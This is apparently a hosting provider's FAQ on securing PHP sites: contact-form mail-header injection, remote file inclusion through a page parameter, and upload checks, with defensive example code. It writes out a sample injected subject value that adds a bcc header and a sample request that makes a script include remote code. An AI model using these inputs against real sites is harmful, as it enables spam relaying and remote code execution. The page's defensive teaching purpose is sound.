Frequently Asked Questions

Lately we see more and more abuse of standard contact forms. An example:

A contact form consists of the fields:
  • Name (1 line)
  • Email address (1 line)
  • Subject (1 line)
  • Message (multiline).

    The "Subject" field is placed in the Subject header of the mail. A PHP command to send mail from this form may look like this:

    mail ("info@mywebsite.com", $subject, $message);

    The headers of this email will then look like this:
    To: info@mywebsite.com
    Subject: $subject


    With form injection (used for sending spam), the subject is submitted as follows:
    subject=This is the subject \nbcc: test@test.com

    The headers will then look like this:
    To: info@mywebsite.com
    Subject: This is the subject
    bcc: test@test.com

    This email is then sent not only to info@mywebsite.com but also to test@test.com, and possibly to many more addresses if several are entered.

    We therefore ask everyone to make sure their contact form is protected. A good countermeasure is to check for the characters \n and \r in every field that should not contain more than one line.

    Example:
    $subject = str_replace(array("\r", "\n"), '', $_POST['subject']);
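    The following is an added example, not code from the original FAQ: a small contact-form handler that applies the rule above to every single-line field. Rather than stripping \r and \n it rejects the submission, because an honest visitor never types a line break into a subject; it also adds a length limit and an address-format check that the FAQ does not mention. The function names, the recipient and the sender address are assumptions.

```php
<?php
// Added example (not from the original FAQ). Function names, recipient and
// sender address are assumptions.

/**
 * Return the value of a single-line form field, or null when it is missing,
 * empty, too long, or contains a carriage return, line feed or NUL byte
 * (the characters a mail-header injection needs).
 */
function single_line_field(array $post, string $name, int $maxLength = 200): ?string
{
    if (!isset($post[$name]) || !is_string($post[$name])) {
        return null;
    }
    $value = trim($post[$name]);
    // Reject rather than strip: a subject carrying \r or \n was not typed by a visitor.
    if ($value === '' || strlen($value) > $maxLength || preg_match('/[\r\n\0]/', $value)) {
        return null;
    }
    return $value;
}

/**
 * Validate the whole form. Returns the clean fields, or an array with an
 * 'errors' key listing what was rejected.
 */
function validate_contact_form(array $post): array
{
    $errors = [];
    $clean  = [];

    foreach (['name', 'email', 'subject'] as $field) {
        $value = single_line_field($post, $field);
        if ($value === null) {
            $errors[] = "Field '$field' is missing, too long, or contains line breaks";
        } else {
            $clean[$field] = $value;
        }
    }

    // The address ends up in a Reply-To header, so validate it as an address,
    // not merely as a single line of text.
    if (isset($clean['email']) && filter_var($clean['email'], FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = "Field 'email' is not a valid address";
    }

    // The message may contain line breaks; it only ever goes into the body.
    $message = isset($post['message']) && is_string($post['message']) ? $post['message'] : '';
    if (trim($message) === '' || strlen($message) > 10000) {
        $errors[] = "Field 'message' is empty or too long";
    }
    $clean['message'] = $message;

    return $errors ? ['errors' => $errors] : $clean;
}

/**
 * Send the mail only after validation succeeded. From stays a fixed address
 * under our own domain; the visitor's address goes into Reply-To.
 */
function send_contact_mail(array $post, string $recipient = 'info@mywebsite.com'): bool
{
    $form = validate_contact_form($post);
    if (isset($form['errors'])) {
        error_log('contact form rejected: ' . implode('; ', $form['errors']));
        return false;
    }
    $headers = [
        'From: webform@mywebsite.com',
        'Reply-To: ' . $form['email'],
        'Content-Type: text/plain; charset=UTF-8',
    ];
    $body = "Name: {$form['name']}\n\n{$form['message']}";
    return mail($recipient, $form['subject'], $body, implode("\r\n", $headers));
}

// Constructed inputs for a local check (not real submissions):
$honest = ['name' => 'Jan', 'email' => 'jan@example.org',
           'subject' => 'Question', 'message' => "Hello,\nis this still available?"];
$injected = $honest;
$injected['subject'] = "This is the subject\nbcc: test@test.com";

$ok  = validate_contact_form($honest);    // clean fields, no 'errors' key
$bad = validate_contact_form($injected);  // 'errors' key present, mail is never sent
var_dump(isset($ok['errors']), isset($bad['errors']));
```

    Logging the rejection (as send_contact_mail does) is worth keeping: a burst of rejected submissions with line breaks in the subject is a clear signal that the form is being probed.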
  • Because many standard scripts (e.g. Joomla) have had exploits in which external code is fetched and executed to cause damage, we have decided to disable opening files from other web sites from PHP. This applies to the following functions:
      • fopen
      • include
      • require
      • include_once
      • require_once
      • file

    Of course there are plenty of reasons your website might need to load files from external web servers. If your web site also requires this,
  • We don't support ASP.
  • Many people build pages from a template and load the page content from a file named in the URL,
    e.g. index.php?page=voorpagina.php

    The file "voorpagina.php" is then loaded through an include.

    Do not do this! By requesting index.php?page=http://www.test.com/phpcode.php a visitor can make your script execute remote code; this is very dangerous!

    It is better to work with a fixed header and footer, but if that is not appropriate, at least check that the file is on the current server, for example by checking that there is no ":" in the $page variable.
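    As an added example (not code from the original FAQ), here is an index.php that keeps the header/footer structure and the ":" check described above, but goes one step further: the page parameter is matched against a fixed list of names and the resolved path is verified to lie inside the pages directory, so that not only remote URLs but also "../" paths and stream wrappers can never reach include. The directory layout and the page names are assumptions.

```php
<?php
// Added example (not from the original FAQ). PAGE_DIR, the page names and
// the header/footer files are assumptions.

const PAGE_DIR      = __DIR__ . '/pages';
const ALLOWED_PAGES = ['voorpagina', 'contact', 'over-ons'];

/**
 * Map the raw ?page= value to a file path inside PAGE_DIR, or return null
 * when the request must be refused.
 */
function resolve_page(?string $page): ?string
{
    if ($page === null || $page === '') {
        $page = 'voorpagina';
    }
    // The FAQ's own rule: a ':' means a URL such as http://..., refuse it outright.
    if (strpos($page, ':') !== false) {
        return null;
    }
    // Stricter than the ':' check: only a bare name from the allowlist is accepted,
    // so directory traversal and stream wrappers are excluded as well.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // Belt and braces: the resolved file must really live under PAGE_DIR.
    $path = realpath(PAGE_DIR . '/' . $page . '.php');
    $dir  = realpath(PAGE_DIR);
    if ($path === false || $dir === false || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage in index.php: a non-string value (e.g. ?page[]=x) is treated as absent.
$raw  = $_GET['page'] ?? null;
$file = resolve_page(is_string($raw) ? $raw : null);

if ($file === null) {
    http_response_code(404);
    echo 'Page not found';
} else {
    require __DIR__ . '/header.php';
    require $file;
    require __DIR__ . '/footer.php';
}
```

    Note that the hosting-side block on remote files only covers the URL case; a local file on the same server can still be included through an unchecked $page, which is why the allowlist matters even where the ":" check passes.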
  • If you allow visitors to upload files, you must make sure that no malicious PHP or other executable code can be uploaded.

    Therefore check the file extension of the uploaded file, so that for example .php is not accepted!
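    As an added example (not code from the original FAQ), the upload check below applies the extension rule and additionally compares the file's actual content type with the extension, since the browser-supplied type and the filename can both be chosen by the visitor. It assumes the fileinfo extension is available and uses an upload directory name and a form field name that are assumptions.

```php
<?php
// Added example (not from the original FAQ). UPLOAD_DIR and the form field
// name 'attachment' are assumptions; the fileinfo extension is required.

const UPLOAD_DIR = __DIR__ . '/uploads';

// Allowlist: extension => MIME type the file content must actually have.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

/**
 * Validate one entry of $_FILES. Returns the extension to store the file
 * under, or a string starting with "error:" explaining the rejection.
 */
function check_upload(array $file, int $maxBytes = 2 * 1024 * 1024): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'error: upload failed or no file sent';
    }
    if (($file['size'] ?? 0) > $maxBytes) {
        return 'error: file too large';
    }
    // Only the last extension counts, and it must be on the allowlist; .php
    // and every other unlisted extension are refused here.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return "error: extension '$ext' is not allowed";
    }
    // Do not trust $file['type'] (sent by the browser); inspect the bytes instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return "error: content type '$mime' does not match extension '$ext'";
    }
    return $ext;
}

/**
 * Store a validated upload under a server-chosen name. Returns the stored
 * name, or null when the file was rejected.
 */
function store_upload(array $file): ?string
{
    $ext = check_upload($file);
    if (strpos($ext, 'error:') === 0) {
        error_log('upload rejected: ' . $ext);
        return null;
    }
    // The visitor's filename never becomes part of the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        return null;
    }
    return $name;
}

// Usage after a form with <input type="file" name="attachment">:
if (isset($_FILES['attachment'])) {
    $stored = store_upload($_FILES['attachment']);
    echo $stored === null ? 'Upload rejected' : 'Stored as ' . htmlspecialchars($stored);
}
```

    Keeping the upload directory outside the web root, or configuring the web server not to execute scripts in it, adds a second layer in case a check is ever bypassed.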